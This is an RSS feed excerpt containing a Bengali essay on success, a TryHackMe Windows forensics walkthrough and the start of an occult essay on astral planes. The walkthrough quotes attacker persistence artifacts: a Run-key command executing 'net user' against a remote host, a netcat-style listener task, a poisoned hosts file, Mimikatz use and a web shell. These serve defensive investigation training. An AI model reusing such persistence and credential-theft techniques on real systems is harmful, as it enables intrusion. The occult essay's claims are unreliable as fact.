একটি দীর্ঘ প্রক্রিয়ার ফসল। সাময়িক লাভ, ক্ষমতা কিংবা বাহবা প্রকৃত সাফল্যের পরিচয় নয়। প্রকৃত সাফল্য গড়ে ওঠে সততা, পরিশ্রম, নৈতিকতা, ধৈর্য ও মানবিকতার ওপর ভর করে।&#xA;&#xA;⠀⠀&#xA;&#xA;⠀⠀&#xA;&#xA;জীবনে দ্রুত সফল হওয়ার চেয়ে সঠিক পথে এগোনো বেশি গুরুত্বপূর্ণ।&#xA;&#xA;জীবন এক নিরন্তর প্রবহমান ধারা। এই ধারার সামনে টিকে থাকার জন্যে সততা, পরিশ্রম, ধৈর্য ও নৈতিকতা -এই চারটি স্তম্ভ শক্ত করে গড়তে হবে। আর এই স্তম্ভের ওপর দাঁড়ানো সাফল্যই প্রকৃত সাফল্য। তাই কাউকে সফল বা ব্যর্থ বলার আগে একটু থামা উচিত। কারণ আমরা দেখি ঢেউয়ের তোড়, কিন্তু জানি না স্রোতের গতি। আর এই অদেখা স্রোতের কাছেই তো শেষ কথা বলার অধিকার থাকে।&#xA;&#xA;⠀⠀&#xA;&#xA;⠀⠀&#xA;&#xA;⠀⠀&#xA;&#xA;⠀⠀&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://images2.imgbox.com/17/72/2y7iZcQF_o.jpg" alt=" "></p>

<p>⠀⠀
আমরা সাধারণত চোখের সামনে যা দেখি, তাকেই সত্য ধরে নিই। আজ কার লাভ হলো, কে উন্নতি করল, কে ক্ষমতার চেয়ারে বসল -এসব দিয়েই আমরা সফলতা আর ব্যর্থতার বিচার করি। অথচ জীবন এত সরল নয়। জীবনের হিসাব অনেক গভীর, অনেক বিস্তৃত। এখানে সময়ের সাথে সাথে জীবনের সমীকরণ বদলায়, আরও বদলে যায় সফলতার সংজ্ঞা।</p>

<p>একদিন তাড়াহুড়ো করে বাসে উঠতে গিয়ে বাদামের ঝুড়ি হাতে রফিক মিয়া হোঁচট খেয়ে পড়ে গেল। ঠিক সেই মুহূর্তে ট্র্যাফিক ছেড়ে দেওয়ায় কয়েকটি গাড়ির চাকার নিচে পিষ্ট হলো তার সারা দিনের পুঁজি -বাদামের ঝুড়ি। মুহূর্তেই শেষ হয়ে গেল তার রুজি-রুটি। অসহায় মুখ নিয়ে দাঁড়িয়ে রইল সে।</p>



<p>অন্যদিকে একই রুটে বাদাম বিক্রি করা শফিক মিয়ার সেদিন দারুণ লাভ হলো। রফিক না থাকায় দ্বিগুণ বিক্রি করল সে। হাতে এলো ভালো অঙ্কের টাকা। আপাতদৃষ্টিতে ঐদিনের জন্য শফিক হলো সফল, আর রফিক হলো ব্যর্থ, নিঃস্ব একজন। কিন্তু সন্ধ্যায় সারা দিনের আয় নিয়ে শফিক বসে গেল জুয়ার আসরে। রাত শেষ হতেই উপার্জিত সব টাকা হারিয়ে সেও শূন্যে নেমে এলো। সকালে দেখা গেল- রফিক আর শফিক দুজনকেই আবার শূন্য শুরু করতে হবে। তবে পার্থক্য এক জায়গায়।</p>

<p>রফিক মিয়া ছিল সৎ, ভদ্র ও পরিশ্রমী মানুষ। সবাই তাকে বিশ্বাস করত। তাই সে যখন নতুন করে ব্যাবসা শুরু করতে চাইল, তখন মানুষ বিনা দ্বিধায় তাকে বাকীতে মাল দিল। মানুষের বিশ্বাসই হয়ে উঠল তার নতুন মূলধন। অন্যদিকে শফিকের জুয়ার নেশা আর অবিশ্বস্ততা কথা সবাই জানত। তাই কেউ তাকে বাকীতে মাল দিতে চাইল না। বিশ্বাসহীন মানুষের জন্য পৃথিবীর কোনো দরজাই কখনো খোলা থাকে না।</p>

<p>⠀⠀
এবার চলুন আরেকটি গল্প শুনি। গল্পটা সুমন নামের এক অফিসের সহকারী ম্যানেজারের। সারাদিন বসকে তোষামোদ করে সময় কাটাত, আবার আড়ালে তারই বদনাম করে বেড়াত। তবে তার একটা সুপ্ত ও গোপন ইচ্ছা ছিল। ইচ্ছেটি ছিল- কবে বসের চাকরি যাবে আর সে সেই চেয়ারে বসবে। অনেক দিন পর তার সেই চাওয়া পূরণ হলো। তার বস চাকরি ছেড়ে চলে গেল, আর সুমন পদোন্নতি পেয়ে হলো ম্যানেজার।</p>

<p>মানুষের চোখে সে সফল। কিন্তু সফলতা আর ইচ্ছে পূরণ তো আর তার চরিত্র বদলাতে পারে না। আগের মতোই চললল তার অফিস পলিটিক্স, ষড়যন্ত্র, স্বজনপ্রীতি আর তোষামোদের রাজনীতি। ফলে বিশ্বস্ত, কর্মঠ ও যোগ্য কর্মচারীরা একে একে চাকরি ছাড়তে লাগল। শূন্য পদে নিয়োগ পেল অদক্ষ, তেলবাজ ও অনভিজ্ঞ লোকজন। আর এসব কারণে কোম্পানির ক্ষতি বাড়তে থাকল। শেষ পর্যন্ত কর্তৃপক্ষ বাধ্য হয়ে সুমন ও তার গড়া পুরো দলকেই ছাঁটাই করলো।</p>

<p>⠀⠀
আরও একটি গল্প শোনা যাক। পরীক্ষায় একজন নকল করে ভালো রেজাল্ট করল, আর অন্যজন সততার সাথে পরিশ্রম করে মাঝারি ফল পেল। সবাই প্রথমজনকে মেধাবী বলল। কিন্তু সময়ের সাথে দেখা গেল- নকলের সাফল্য টেকেনি, আর পরিশ্রমী মানুষটি ধীরে ধীরে জীবনে অনেক দূর এগিয়ে গেছে।</p>

<p>এই গল্পগুলো আমাদের চারপাশে ঘটে চলেছে। গল্প গুলো আমাদের শেখায়- সফলতা একদিনের অর্জন নয়, এটি একটি দীর্ঘ প্রক্রিয়ার ফসল। সাময়িক লাভ, ক্ষমতা কিংবা বাহবা প্রকৃত সাফল্যের পরিচয় নয়। প্রকৃত সাফল্য গড়ে ওঠে সততা, পরিশ্রম, নৈতিকতা, ধৈর্য ও মানবিকতার ওপর ভর করে।</p>

<p>⠀⠀</p>

<p>⠀⠀</p>

<p>জীবনে দ্রুত সফল হওয়ার চেয়ে সঠিক পথে এগোনো বেশি গুরুত্বপূর্ণ।</p>

<p>জীবন এক নিরন্তর প্রবহমান ধারা। এই ধারার সামনে টিকে থাকার জন্যে সততা, পরিশ্রম, ধৈর্য ও নৈতিকতা -এই চারটি স্তম্ভ শক্ত করে গড়তে হবে। আর এই স্তম্ভের ওপর দাঁড়ানো সাফল্যই প্রকৃত সাফল্য। তাই কাউকে সফল বা ব্যর্থ বলার আগে একটু থামা উচিত। কারণ আমরা দেখি ঢেউয়ের তোড়, কিন্তু জানি না স্রোতের গতি। আর এই অদেখা স্রোতের কাছেই তো শেষ কথা বলার অধিকার থাকে।</p>

<p>⠀⠀</p>

<p>⠀⠀</p>

<p>⠀⠀</p>

<p>⠀⠀</p>
]]></content:encoded>
      <author>লোকমানুষ এর ব্লগ</author>
      <guid>https://infosec.press/read/a/thvom7w1n3</guid>
      <pubDate>Thu, 26 Feb 2026 19:14:39 +0000</pubDate>
    </item>
    <item>
      <title>Investigating Windows – TryHackMe Defensive Security Challenge</title>
      <link>https://infosec.press/plutogazer/defending-windows-tryhackme-defensive-security-challenge</link>
      <description>&lt;![CDATA[This is a Walkthrough for the Investigating Windows Digital Forensics TryHackMe challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer for those interested in finding out more about the solution to a specific task.&#xA;&#xA;Introduction&#xA;The description of the room is the following:&#xA;blockquote&#xA;A windows machine has been hacked, its your job to go investigate this windows machine and find clues to what the hacker might have done.&#xA;/blockquote&#xA;&#xA;The room has us running commands and investigating logs after a Windows machine was compromised. To do this we will use the Windows Command Line, the Powershell, the Registry, and the Windows Event Viewer to examine Security Logs.&#xA;Sysmon was not available for use in this machine.&#xA;&#xA;Task 1: Whats the version and year of the windows machine?&#xA;&#xA;We need to run the following command:&#xA;systeminfo&#xA;&#xA;The answer is&#xA;blockquote&#xA;Windows Server 2016&#xA;/blockquote&#xA;Task 2: Which user logged in last?&#xA;There are two ways of doing this: checking either Security Logs or using the Powershell. Let&#39;s do both.&#xA;Powershell&#xA;By using the command&#xA;Get-LocalUser | Select Name, LastLogon&#xA;We will be shown a list with all users and their last logon. We choose the most recent one.&#xA;&#xA;blockquote&#xA;Name           LastLogon&#xA;br&#xA;----           ---------&#xA;br&#xA;Administrator  2/22/2026 9:41:12 PM&#xA;br&#xA;DefaultAccount&#xA;br&#xA;Guest&#xA;br&#xA;Jenny&#xA;br&#xA;John           3/2/2019 5:48:32 PM&#xA;/blockquote&#xA;&#xA;Security Logs&#xA;This is more complex as it requires us to examine Security Logs in the Windows Event Viewer.&#xA;This machine, however, contains tens of thousands of Security Logs. We can filter them by Event ID 4624, which corresponds to Successful Logon events. In the previous task, we found out that the domain for the machine was EC2AMAZ-I8UHO76, so the account in question&#39;s domain has to be this one. We need to find the latest one. &#xA;&#xA;Regardless of method, the answer is:  &#xA;&#xA;blockquote&#xA;Administrator&#xA;/blockquote&#xA;&#xA;Task 3: When did John log onto the system last?&#xA;See the previous task. The answer format: MM/DD/YYYY H:MM:SS AM/PM (the Windows machine already provides dates in this format).&#xA;&#xA;We can also use the Command Line with the following command: &#xA;net user John&#xA;&#xA;Answer:&#xA;blockquote&#xA;03/02/2019 5:48:32 PM&#xA;/blockquote&#xA;&#xA;Task 4: What IP does the system connect to when it first starts?&#xA;For this, we have to take a look at the Registry. Specifically, the following key:&#xA;blockquote&#xA;HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&#xA;/blockquote&#xA;&#xA;This contains a value named UpdateSvc that is running a process:&#xA;C:\TMP\p.exe -s \\10.34.2.3 &#39;net user&#39;   C:\TMP\o2.txt&#xA;&#xA;We know this is not normal Windows behavior at all, as it is sending user information to a file created in a directory called &#34;Tmp&#34;. The answer to our task is right there:&#xA;blockquote&#xA;10.34.2.3&#xA;/blockquote&#xA;&#xA;Task 5: What two accounts had administrative privileges (other than the Administrator user)?&#xA;We can find out about this using the Powershell again, by running the following command:&#xA;Get-LocalGroupMember -Group &#34;Administrators&#34;&#xA;&#xA;We get the following output:&#xA;blockquote&#xA;ObjectClass Name                          PrincipalSource&#xA;br&#xA;----------- ----                          ---------------&#xA;br&#xA;User        EC2AMAZ-I8UHO76\Administrator Local&#xA;br&#xA;User        EC2AMAZ-I8UHO76\Guest         Local&#xA;br&#xA;User        EC2AMAZ-I8UHO76\Jenny         Local&#xA;/blockquote&#xA;&#xA;The answer is in the following format: &#34;[...], [...]&#34;, in alphabetical order:&#xA;blockquote&#xA;Guest, Jenny&#xA;/blockquote&#xA;&#xA;Task 6: Whats the name of the scheduled task that is malicious.&#xA;I tried to find it in the Event Viewer by using Event ID 4698 (Scheduled Task Creation), but it returned no result, meaning that it could have been cleared. For this, we need to use Task Scheduler.&#xA;&#xA;We will eventually find a task named &#34;Clean file system&#34;, which definitely sounds like a custom task, and it is run by Administrator at 4:55 PM every day. It runs: C:\TMP\nc.ps1 -l 1348&#xA;Judging by the name and the argument, it looks like the Powershell is trying to run a shell listener (most likely netcat).&#xA;&#xA;Answer:&#xA;blockquote&#xA;Clean file system&#xA;/blockquote&#xA;Task 7: What file was the task trying to run daily?&#xA;See above&#xA;Answer:&#xA;blockquote&#xA;nc.ps1&#xA;/blockquote&#xA;&#xA;Task 8: When did Jenny last logon?&#xA;See  Task 3. As nothing appears on the &#34;LastLogon&#34; field, it means never.&#xA;Alternatively, the command &#34;net user Jenny&#34; explicitly says Never.&#xA;&#xA;Answer:&#xA;blockquote&#xA;Never&#xA;/blockquote&#xA;&#xA;Task 9: At what date did the compromise take place?&#xA;This is a tricky one as we do not have an answer by itself, so we need to surmise it by context. If we take a look at Event ID 4732 (Member added to a security group) we will see that the user John was added to Users. This is done automatically when a user is created. By taking a look at the properties regarding the creation of processes, folder creation, scheduled task, and registry values of previous tasks, we can find that all happened on the same day, 03/02/ 2019.&#xA;We also know that the user Jenny is an administrator, yet this user has never logged in... weird for an administrator to do. When we used the command of Task 8, we found that Jenny&#39;s &#34;Password last set&#34; attribute was on 03/02/ 2019. If Jenny&#39;s password was last set on that day, and Jenny never logged in, we can presume that&#39;s the day the user Jenny was created. These are actually common Persistence techniques used in attacks (MITRE ATT&amp;CK ID T1136 - Create Account and ID T1098 - Account Manipulation)&#xA;&#xA;Answer format: MM/DD/YYYY&#xA;blockquote&#xA;03/02/2019&#xA;/blockquote&#xA;Task 10: During the compromise, at what time did Windows first assign special privileges to a new logon?&#xA;Using the Event Viewer, we can filter by Event ID. I first tried using IDs 4720 and 4732, but had no luck. Then I filtered the following:  Event ID 4672 (Special Privileges Assigned to new Logon)&#xA;&#xA;We will have to check the details for these, or use the hint TryHackMe provides (it occurs at ?:??:49)&#xA;The answer is:&#xA;blockquote&#xA;03/02/2019 4:04:49 PM&#xA;/blockquote&#xA;&#xA;Task 11: What tool was used to get Windows passwords?&#xA;On previous tasks, one folder kept coming up: \TMP\. This seems to be the place files relevant for the attack are being kept.&#xA;The folder contains several files: .tmp, .exe, .ps1, and .txt.&#xA;Taking a look at the Text files, we find &#34;mim-out.txt&#34;. If we read it, we&#39;ll find that we are looking at Mimikatz output. Mimkatz is a credential stealer.&#xA;&#xA;Answer:&#xA;blockquote&#xA;Mimikatz&#xA;/blockquote&#xA;&#xA;Task 12: What was the attackers external control and command servers IP?&#xA;If there is a Control and Command server, we need to check a file that contains the DNS mappings for the machine. This would be the etc\hosts file. On this machine, the file can be found at C:\Windows\System32\drivers\etc.&#xA;The contents of the file are:&#xA;&#xA;blockquote&#xA;10.2.2.2&#x9;update.microsoft.com&#xA;br&#xA;127.0.0.1  www.virustotal.com &#xA;br&#xA;127.0.0.1  www.www.com &#xA;br&#xA;127.0.0.1  dci.sophosupd.com &#xA;br&#xA;10.2.2.2&#x9;update.microsoft.com &#xA;br&#xA;127.0.0.1  www.virustotal.com &#xA;br&#xA;127.0.0.1  www.www.com &#xA;br&#xA;127.0.0.1  dci.sophosupd.com &#xA;br&#xA;10.2.2.2&#x9;update.microsoft.com &#xA;br&#xA;127.0.0.1  www.virustotal.com &#xA;br&#xA;127.0.0.1  www.www.com &#xA;br&#xA;127.0.0.1  dci.sophosupd.com &#xA;br&#xA;76.32.97.132 google.com&#xA;br&#xA;76.32.97.132 www.google.com&#xA;/blockquote&#xA;76.32.97.132 does not seem to be the correct IP for google.com. This is most likely DNS poisoning - every time the machine tries to reach google.com, it will be redirected to a fake website posing as google.&#xA;&#xA;Answer:&#xA;blockquote&#xA;76.32.97.132&#xA;/blockquote&#xA;&#xA;Task 13:  What was the extension name of the shell uploaded via the servers website?&#xA;If we take a look at the directories in the machine, we will find inetpub, which is used by IIS, a web server from Microsoft. Inside we can find the wwwroot folder, which will contain all the server files. We will also find a file named &#34;shell.jsp&#34;.&#xA;&#xA;Answer:&#xA;blockquote&#xA;.jsp&#xA;/blockquote&#xA;&#xA;Task 14: What was the last port the attacker opened?&#xA;Check firewall rules. Latest one is called &#34;Allow outside connection for development&#34;, on Local Port 1337.&#xA;Answer:&#xA;blockquote&#xA;1337&#xA;/blockquote&#xA;&#xA;Task 15: Check for DNS poisoning, what site was targeted?&#xA;See Task 13, the etc\hosts file.&#xA;A:&#xA;blockquote&#xA;google.com&#xA;/blockquote&#xA;&#xA;b style=&#34;color:darkgreen&#34;Congratulations!/b The room is finished.&#xA;&#xA;Conclusion&#xA;This was actually an entertaining room! Unlike other Blue Team rooms I&#39;ve completed in the past, this one clearly had more of a focus on Post-Incidents activities rather than Prevention or Detection in real-time. I had to learn new Event IDs, learn to keep the etc\hosts file in mind, especially when C2 and DNS Poisoning are suspected, and how to manually investigate a machine, instead of relying on automatic logs. ]]&gt;</description>
      <content:encoded><![CDATA[<p>This is a Walkthrough for the <a href="https://tryhackme.com/room/investigatingwindows" rel="nofollow">Investigating Windows</a> Digital Forensics <a href="https://tryhackme.com" rel="nofollow">TryHackMe</a> challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer for those interested in finding out more about the solution to a specific task.</p>

<h2 id="introduction">Introduction</h2>

<p>The description of the room is the following:
<blockquote>A windows machine has been hacked, its your job to go investigate this windows machine and find clues to what the hacker might have done.
</blockquote></p>

<p>The room has us running commands and investigating logs after a Windows machine was compromised. To do this we will use the <strong>Windows Command Line</strong>, the <strong>Powershell</strong>, the <strong>Registry</strong>, and the <strong>Windows Event Viewer</strong> to examine Security Logs.
Sysmon was not available for use in this machine.</p>

<h2 id="task-1-whats-the-version-and-year-of-the-windows-machine">Task 1: Whats the version and year of the windows machine?</h2>

<p>We need to run the following command:</p>

<pre><code>systeminfo
</code></pre>

<p>The answer is
<blockquote>Windows Server 2016
</blockquote></p>

<h2 id="task-2-which-user-logged-in-last">Task 2: Which user logged in last?</h2>

<p>There are two ways of doing this: checking either <strong>Security Logs</strong> or using the <strong>Powershell</strong>. Let&#39;s do both.</p>

<h3 id="powershell">Powershell</h3>

<p>By using the command</p>

<pre><code>Get-LocalUser | Select Name, LastLogon
</code></pre>

<p>We will be shown a list with all users and their last logon. We choose the most recent one.</p>

<blockquote>Name           LastLogon
<br>
----           ---------
<br>
Administrator  2/22/2026 9:41:12 PM
<br>
DefaultAccount
<br>
Guest
<br>
Jenny
<br>
John           3/2/2019 5:48:32 PM
</blockquote>

<h3 id="security-logs">Security Logs</h3>

<p>This is more complex as it requires us to examine <strong>Security Logs</strong> in the <strong>Windows Event Viewer</strong>.
This machine, however, contains tens of thousands of Security Logs. We can filter them by <strong>Event ID 4624</strong>, which corresponds to <strong>Successful Logon</strong> events. In the previous task, we found out that the domain for the machine was EC2AMAZ-I8UHO76, so the account in question&#39;s domain has to be this one. We need to find the latest one.</p>

<p>Regardless of method, the answer is:</p>

<blockquote>Administrator
</blockquote>

<h2 id="task-3-when-did-john-log-onto-the-system-last">Task 3: When did John log onto the system last?</h2>

<p>See the previous task. The answer format: MM/DD/YYYY H:MM:SS AM/PM (the Windows machine already provides dates in this format).</p>

<p>We can also use the Command Line with the following command:</p>

<pre><code>net user John
</code></pre>

<p>Answer:
<blockquote>03/02/2019 5:48:32 PM
</blockquote></p>

<h2 id="task-4-what-ip-does-the-system-connect-to-when-it-first-starts">Task 4: What IP does the system connect to when it first starts?</h2>

<p>For this, we have to take a look at the <strong>Registry</strong>. Specifically, the following key:
<blockquote>HKEY<em>LOCAL</em>MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
</blockquote></p>

<p>This contains a value named <strong>UpdateSvc</strong> that is running a process:</p>

<pre><code>C:\TMP\p.exe -s \\10.34.2.3 &#39;net user&#39; &gt; C:\TMP\o2.txt
</code></pre>

<p>We know this is not normal Windows behavior at all, as it is sending user information to a file created in a directory called “Tmp”. The answer to our task is right there:
<blockquote>10.34.2.3
</blockquote></p>

<h2 id="task-5-what-two-accounts-had-administrative-privileges-other-than-the-administrator-user">Task 5: What two accounts had administrative privileges (other than the Administrator user)?</h2>

<p>We can find out about this using the Powershell again, by running the following command:</p>

<pre><code class="language-powershell">Get-LocalGroupMember -Group &#34;Administrators&#34;
</code></pre>

<p>We get the following output:
<blockquote>ObjectClass Name                          PrincipalSource
<br></p>

<hr>

<p><br>
User        EC2AMAZ-I8UHO76\Administrator Local
<br>
User        EC2AMAZ-I8UHO76\Guest         Local
<br>
User        EC2AMAZ-I8UHO76\Jenny         Local
</blockquote></p>

<p>The answer is in the following format: “[...], [...]“, in alphabetical order:
<blockquote>Guest, Jenny
</blockquote></p>

<h2 id="task-6-whats-the-name-of-the-scheduled-task-that-is-malicious">Task 6: Whats the name of the scheduled task that is malicious.</h2>

<p>I tried to find it in the Event Viewer by using Event ID 4698 (Scheduled Task Creation), but it returned no result, meaning that it could have been cleared. For this, we need to use <strong>Task Scheduler</strong>.</p>

<p>We will eventually find a task named “<strong>Clean file system</strong>”, which definitely sounds like a custom task, and it is run by Administrator at 4:55 PM every day. It runs: C:\TMP\nc.ps1 -l 1348
Judging by the name and the argument, it looks like the Powershell is trying to run a <strong>shell listener</strong> (most likely netcat).</p>

<p>Answer:
<blockquote>Clean file system
</blockquote></p>

<h2 id="task-7-what-file-was-the-task-trying-to-run-daily">Task 7: What file was the task trying to run daily?</h2>

<p>See above
Answer:
<blockquote>nc.ps1
</blockquote></p>

<h2 id="task-8-when-did-jenny-last-logon">Task 8: When did Jenny last logon?</h2>

<p>See  Task 3. As nothing appears on the “LastLogon” field, it means never.
Alternatively, the command “net user Jenny” explicitly says Never.</p>

<p>Answer:
<blockquote>Never
</blockquote></p>

<h2 id="task-9-at-what-date-did-the-compromise-take-place">Task 9: At what date did the compromise take place?</h2>

<p>This is a tricky one as we do not have an answer by itself, so we need to surmise it by context. If we take a look at <strong>Event ID 4732 (Member added to a security group)</strong> we will see that the user John was added to Users. This is done automatically when a user is created. By taking a look at the properties regarding the creation of processes, folder creation, scheduled task, and registry values of previous tasks, we can find that all happened on the same day, <strong>03/02/ 2019</strong>.
We also know that the user Jenny is an administrator, yet this user has never logged in... weird for an administrator to do. When we used the command of Task 8, we found that Jenny&#39;s “Password last set” attribute was on <strong>03/02/ 2019</strong>. If Jenny&#39;s password was last set on that day, and Jenny never logged in, we can presume that&#39;s the day the user Jenny was created. These are actually common Persistence techniques used in attacks (MITRE ATT&amp;CK ID T1136 – Create Account and ID T1098 – Account Manipulation)</p>

<p>Answer format: MM/DD/YYYY
<blockquote>03/02/2019
</blockquote></p>

<h2 id="task-10-during-the-compromise-at-what-time-did-windows-first-assign-special-privileges-to-a-new-logon">Task 10: During the compromise, at what time did Windows first assign special privileges to a new logon?</h2>

<p>Using the <strong>Event Viewer</strong>, we can filter by Event ID. I first tried using IDs 4720 and 4732, but had no luck. Then I filtered the following:  <strong>Event ID 4672 (Special Privileges Assigned to new Logon)</strong></p>

<p>We will have to check the details for these, or use the hint TryHackMe provides (it occurs at ?:??:49)
The answer is:
<blockquote>03/02/2019 4:04:49 PM
</blockquote></p>

<h2 id="task-11-what-tool-was-used-to-get-windows-passwords">Task 11: What tool was used to get Windows passwords?</h2>

<p>On previous tasks, one folder kept coming up: <strong><code>\TMP\</code></strong>. This seems to be the place files relevant for the attack are being kept.
The folder contains several files: .tmp, .exe, .ps1, and .txt.
Taking a look at the Text files, we find <strong>“mim-out.txt”</strong>. If we read it, we&#39;ll find that we are looking at <strong>Mimikatz</strong> output. Mimkatz is a credential stealer.</p>

<p>Answer:
<blockquote>Mimikatz
</blockquote></p>

<h2 id="task-12-what-was-the-attackers-external-control-and-command-servers-ip">Task 12: What was the attackers external control and command servers IP?</h2>

<p>If there is a Control and Command server, we need to check a file that contains the DNS mappings for the machine. This would be the <strong>etc\hosts</strong> file. On this machine, the file can be found at C:\Windows\System32\drivers\etc.
The contents of the file are:</p>

<blockquote>10.2.2.2    update.microsoft.com
<br>
127.0.0.1  www.virustotal.com 
<br>
127.0.0.1  www.www.com 
<br>
127.0.0.1  dci.sophosupd.com 
<br>
10.2.2.2    update.microsoft.com 
<br>
127.0.0.1  www.virustotal.com 
<br>
127.0.0.1  www.www.com 
<br>
127.0.0.1  dci.sophosupd.com 
<br>
10.2.2.2    update.microsoft.com 
<br>
127.0.0.1  www.virustotal.com 
<br>
127.0.0.1  www.www.com 
<br>
127.0.0.1  dci.sophosupd.com 
<br>
76.32.97.132 google.com
<br>
76.32.97.132 www.google.com
</blockquote>
**76.32.97.132** does not seem to be the correct IP for google.com. This is most likely DNS poisoning - every time the machine tries to reach google.com, it will be redirected to a fake website posing as google.

Answer:
<blockquote>76.32.97.132
</blockquote>

<h2 id="task-13-what-was-the-extension-name-of-the-shell-uploaded-via-the-servers-website">Task 13:  What was the extension name of the shell uploaded via the servers website?</h2>

<p>If we take a look at the directories in the machine, we will find <strong>inetpub</strong>, which is used by IIS, a web server from Microsoft. Inside we can find the <strong>wwwroot</strong> folder, which will contain all the server files. We will also find a file named <strong>“shell.jsp”</strong>.</p>

<p>Answer:
<blockquote>.jsp
</blockquote></p>

<h2 id="task-14-what-was-the-last-port-the-attacker-opened">Task 14: What was the last port the attacker opened?</h2>

<p>Check firewall rules. Latest one is called “Allow outside connection for development”, on Local Port <strong>1337</strong>.
Answer:
<blockquote>1337
</blockquote></p>

<h2 id="task-15-check-for-dns-poisoning-what-site-was-targeted">Task 15: Check for DNS poisoning, what site was targeted?</h2>

<p>See Task 13, the <strong>etc\hosts</strong> file.
A:
<blockquote>google.com
</blockquote></p>

<p><b style="color:darkgreen">Congratulations!</b> The room is finished.</p>

<h2 id="conclusion">Conclusion</h2>

<p>This was actually an entertaining room! Unlike other Blue Team rooms I&#39;ve completed in the past, this one clearly had more of a focus on Post-Incidents activities rather than Prevention or Detection in real-time. I had to <strong>learn new Event IDs</strong>, learn to <strong>keep the etc\hosts file in mind</strong>, especially when C2 and DNS Poisoning are suspected, and how to <strong>manually investigate</strong> a machine, instead of relying on automatic logs.</p>
]]></content:encoded>
      <author>plutogazer writeups</author>
      <guid>https://infosec.press/read/a/n1ivep6o02</guid>
      <pubDate>Wed, 25 Feb 2026 20:27:15 +0000</pubDate>
    </item>
    <item>
      <title>Altered States</title>
      <link>https://infosec.press/psychomancer/altered-states</link>
      <description>&lt;![CDATA[---&#xA;created: 2024-06-23T14:57:42&#xA;updated: 2025-07-31T23:43:24&#xA;modified: 2026-02-09T07:10:38-06:00&#xA;---&#xA;&#xA;Editor&#39;s note: the fool thinks himself cartographer charting five dimensional space-time as if a plane could hold its complexity. Nor does he address its propensity for change where blurry borders shift as swiftly as the dunes and just as unpredictably. Still, it may help the layperson understand their place, insubstantial though it may be. - ANV.&#xA;&#xA;Two toruses surrounding a sphere with all of them bleeding into one another, gradually becoming each other.&#xA;&#xA;🜁🜂🜃🜄&#xA;&#xA;---&#xA; &#xA;Our universe, all of reality as we can objectively experience it and study it, is but one level of a greater existence. We occupy a world of three spatial dimensions and one of time. The two are interlinked and influence each other such that we call the whole thing space-time. The only real difference between time and space is that time moves only in a single direction for us. We can slow it down, even stop it, but we cannot reverse it or travel backwards upon its trajectory. This leads to entropy, the fact that everything we know will one day end.&#xA;&#xA;But there are other places that our minds can reach into given the right circumstances. Some of these are what we might call parallel, some are &#34;above&#34; or &#34;below&#34;, but all are in directions that have no names and that cannot be described easily by science. They are mystical places, magickal realms that require altered states to experience.&#xA;&#xA;Intelligence, sapience, self-awareness are the keys to this type of &#34;travel&#34;. Humans have evolved the capacity for it. Perhaps thanks to genetic coding from our forebearers. Perhaps, given time, all intelligence will develop these abilities.&#xA;&#xA;IMAGES MISSING&#xA;&#xA;The Other Way / The Æther / The Astral Plane&#xA;Directly on top of what we can see with our eyes is another place with many names. To see in that space is called looking the Other Way by some or seeing auras. When science wasn&#39;t as strong as it is today, everyone believed it was there, just invisible. Today, it is left to the realm of magick and psychics, unfortunately.&#xA;&#xA;Most sapient life can peer into this place with practice. Looking the Other Way is also called opening the third eye but, in truth, it is looking at the world from an impossible angle, orthogonally. Our biology is not designed to understand this strange direction so we have developed a series of sensory metaphors accepted into the universal unconsciousness that allows us to interpret it without going mad.&#xA;&#xA;We see auras and visions, we hear music or discord, we smell flowers or filth, we feel tingling or coldness on our skin, we taste sweetness or other things. It is the way we see a deeper truth about the world around us.  &#xA;The dead leave their imprint on this place and you may find ghosts or spirits. Do not be fooled by them. They are not the people they represent. They are echoes, imprints, memories of them, but they are not truly living things. Given time, they may believe themselves to be who they seem, but it is a self-deception.&#xA;&#xA;Among the ghosts are things that feed on such energy and things that can feed on our lifeforce directly. To feed, they need to be perceived. But only once. If you see them, smell them, taste them, they can touch you in return and, in touching, attach themselves. From that moment forward, you have a parasite that will suckle itself on your dreams, your hopes, your fears, your tears, any strong emotions, though some seem to have preferences. To remove them, you have to see them once again which, of course, opens you up to more attacks.&#xA;&#xA;There are even fully sapient beings that appear to be native to this place, taking innumerable shapes and having their own drives and desires. They may choose to reach out to us as friends or as predators, but mostly they ignore us as not worth the effort.&#xA;&#xA;There are some humans who can leave their bodies behind, but tethered, and send their essence far out into the Other Way, discovering those temples and cities, graveyards and ruins of all civilizations that came before and where the old gods once resided. The silver cord connecting the wandering soul to the body is thin, nearly invisible, but it is strong as spider silk spun from steel. Strong, but not impervious to damage. If the cord is broken, the traveler must find their own way home. If they have gone far enough, this may be impossible, leaving their body without a force to drive it, sleeping dreamlessly, autonomously breathing, digesting, living, but not truly alive. When the body eventually dies, the spirit will feel its loss and it, too, will fade.&#xA;&#xA;The other possibility is you may return to find that your body is no longer yours at all. While absent your body, some opportunistic being may slither inside the hole you left behind. You will become &#34;indwelt&#34; by something that noticed your absence. They will have your body and your mind, more than enough to be you and take over your life. The only thing missing is your soul which, with the loss of the body, will likely fade or be devoured. “You” will cease to be while the thing wearing your skin and remembering your memories is free to experience the physical world for the rest of your lifetime.&#xA;&#xA;Looking the Other Way is difficult and dangerous. For most, it is just a &#34;feeling&#34; or a &#34;knowing&#34; that comes at certain times, nothing as dramatic as auras or ghosts. And, if you have these extra senses? Embrace them, enjoy them, use them, but do not choose to venture further afield unless you are willing to accept the risks.&#xA;&#xA;The Dreaming&#xA;The Dreaming is easy to reach. Just go to sleep for 90 minutes or so and your brain reaches out to it automatically. It&#39;s the little melting pot of the collective unconscious, where we go to sort through our memories and feelings and give our brains little bit of a workout for the night. It&#39;s exercise for your subconscious. It&#39;s healthy and natural to be here and everybody does it.&#xA;&#xA;The Dreaming is not designed to be a place that builds memories. Your brain goes out of its way to make the conscious mind forget what it experiences. It is only through luck or practice that we may begin to remember our dreams in detail. And that is the first step to going deeper.&#xA;&#xA;The Dreamlands&#xA;The Dreamlands are a little bit deeper. You have to reach the Dreaming first, before you can reach the Dreamlands. You have to find the way. Sometimes, you fall into the Dreamlands by mistake and experience the most amazing, life-changing dreams you&#39;ve ever felt. Realer than real. Colors with no names, indescribable music, flying and swimming, life affirming, impossible to forget.&#xA;&#xA;But, typically, you have to find your way to the Dreamlands. You have to understand first that you are dreaming, which is more difficult than it 